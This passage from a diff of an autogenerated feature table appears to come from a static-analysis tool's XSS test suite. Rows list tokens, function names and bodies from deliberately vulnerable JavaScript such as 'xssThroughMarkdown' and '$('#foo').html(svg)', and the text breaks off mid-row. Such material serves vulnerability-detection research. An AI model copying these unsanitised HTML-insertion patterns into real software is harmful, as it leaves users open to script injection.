constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:50:111:52 | svg | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:50:111:52 | svg | contextSurroundingFunctionParameters | (x)\n(svg) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:50:111:52 | svg | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:50:111:52 | svg | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:50:111:52 | svg | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:50:111:52 | svg | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:50:111:52 | svg | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:50:111:52 | svg | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:112:9:112:9 | $ | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:112:9:112:9 | $ | contextSurroundingFunctionParameters | (x)\n(svg) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:112:9:112:9 | $ | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:112:9:112:9 | $ | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:112:9:112:9 | $ | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:112:9:112:17 | $("#foo") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:112:9:112:17 | $("#foo") | contextSurroundingFunctionParameters | (x)\n(svg) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:112:9:112:17 | $("#foo") | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:112:9:112:17 | $("#foo") | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:112:9:112:17 | $("#foo") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:112:9:112:17 | exceptional return of $("#foo") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:112:9:112:17 | exceptional return of $("#foo") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:112:9:112:17 | exceptional return of $("#foo") | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:112:9:112:17 | exceptional return of $("#foo") | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:112:9:112:17 | exceptional return of $("#foo") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:112:9:112:22 | $("#foo").html | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:112:9:112:22 | $("#foo").html | contextSurroundingFunctionParameters | (x)\n(svg) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:112:9:112:22 | $("#foo").html | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:112:9:112:22 | $("#foo").html | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:112:9:112:22 | $("#foo").html | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:112:9:112:27 | $("#foo").html(svg) | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:112:9:112:27 | $("#foo").html(svg) | contextSurroundingFunctionParameters | (x)\n(svg) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:112:9:112:27 | $("#foo").html(svg) | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:112:9:112:27 | $("#foo").html(svg) | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:112:9:112:27 | $("#foo").html(svg) | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:112:9:112:27 | exceptional return of $("#foo").html(svg) | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:112:9:112:27 | exceptional return of $("#foo").html(svg) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:112:9:112:27 | exceptional return of $("#foo").html(svg) | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:112:9:112:27 | exceptional return of $("#foo").html(svg) | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:112:9:112:27 | exceptional return of $("#foo").html(svg) | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:112:11:112:16 | "#foo" | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:112:11:112:16 | "#foo" | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:112:11:112:16 | "#foo" | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | @@ -23569,6 +154088,11 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/main.js:112:11:112:16 | "#foo" | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:112:11:112:16 | "#foo" | enclosingFunctionName | usesCreateHTML | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:112:11:112:16 | "#foo" | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:112:19:112:22 | html | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:112:19:112:22 | html | contextSurroundingFunctionParameters | (x)\n(svg) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:112:19:112:22 | html | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:112:19:112:22 | html | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:112:19:112:22 | html | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:112:24:112:26 | svg | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:112:24:112:26 | svg | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:112:24:112:26 | svg | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | @@ -23576,11 +154100,103 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/main.js:112:24:112:26 | svg | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:112:24:112:26 | svg | enclosingFunctionName | usesCreateHTML | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:112:24:112:26 | svg | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:116:1:116:6 | module | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:116:1:116:6 | module | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:116:1:116:6 | module | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:116:1:116:14 | module.exports | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:116:1:116:14 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:116:1:116:14 | module.exports | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:116:1:116:33 | module. ... arkdown | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:116:1:116:33 | module. ... arkdown | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:116:1:116:33 | module. ... arkdown | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:116:1:119:1 | module. ... html;\\n} | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:116:1:119:1 | module. ... html;\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:116:1:119:1 | module. ... html;\\n} | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:116:8:116:14 | exports | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:116:8:116:14 | exports | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:116:8:116:14 | exports | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:116:16:116:33 | xssThroughMarkdown | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:116:16:116:33 | xssThroughMarkdown | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:116:16:116:33 | xssThroughMarkdown | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:116:37:116:36 | markdown | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:116:37:116:36 | markdown | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:116:37:116:36 | markdown | enclosingFunctionBody | s html markdown render s document querySelector #markdown innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:116:37:116:36 | markdown | enclosingFunctionName | xssThroughMarkdown | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:116:37:116:36 | markdown | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:116:37:116:36 | this | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:116:37:116:36 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:116:37:116:36 | this | enclosingFunctionBody | s html markdown render s document querySelector #markdown innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:116:37:116:36 | this | enclosingFunctionName | xssThroughMarkdown | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:116:37:116:36 | this | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:116:37:119:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:116:37:119:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:116:37:119:1 | 'arguments' object of anonymous function | enclosingFunctionBody | s html markdown render s document querySelector #markdown innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:116:37:119:1 | 'arguments' object of anonymous function | enclosingFunctionName | xssThroughMarkdown | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:116:37:119:1 | 'arguments' object of anonymous function | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:116:37:119:1 | exceptional return of anonymous function | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:116:37:119:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:116:37:119:1 | exceptional return of anonymous function | enclosingFunctionBody | s html markdown render s document querySelector #markdown innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:116:37:119:1 | exceptional return of anonymous function | enclosingFunctionName | xssThroughMarkdown | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:116:37:119:1 | exceptional return of anonymous function | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:116:37:119:1 | functio ... html;\\n} | assignedToPropName | xssThroughMarkdown | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:116:37:119:1 | functio ... html;\\n} | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:116:37:119:1 | functio ... html;\\n} | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:116:37:119:1 | functio ... html;\\n} | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:116:37:119:1 | return of anonymous function | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:116:37:119:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:116:37:119:1 | return of anonymous function | enclosingFunctionBody | s html markdown render s document querySelector #markdown innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:116:37:119:1 | return of anonymous function | enclosingFunctionName | xssThroughMarkdown | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:116:37:119:1 | return of anonymous function | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:116:47:116:47 | s | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:116:47:116:47 | s | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:116:47:116:47 | s | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:116:47:116:47 | s | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:116:47:116:47 | s | enclosingFunctionBody | s html markdown render s document querySelector #markdown innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:116:47:116:47 | s | enclosingFunctionBody | s html markdown render s document querySelector #markdown innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:116:47:116:47 | s | enclosingFunctionName | xssThroughMarkdown | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:116:47:116:47 | s | enclosingFunctionName | xssThroughMarkdown | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:116:47:116:47 | s | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:116:47:116:47 | s | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:117:11:117:14 | html | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:117:11:117:14 | html | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:117:11:117:14 | html | enclosingFunctionBody | s html markdown render s document querySelector #markdown innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:117:11:117:14 | html | enclosingFunctionName | xssThroughMarkdown | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:117:11:117:14 | html | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:117:11:117:35 | html | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:117:11:117:35 | html | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:117:11:117:35 | html | enclosingFunctionBody | s html markdown render s document querySelector #markdown innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:117:11:117:35 | html | enclosingFunctionName | xssThroughMarkdown | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:117:11:117:35 | html | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:117:11:117:35 | html = ... nder(s) | contextFunctionInterfaces | 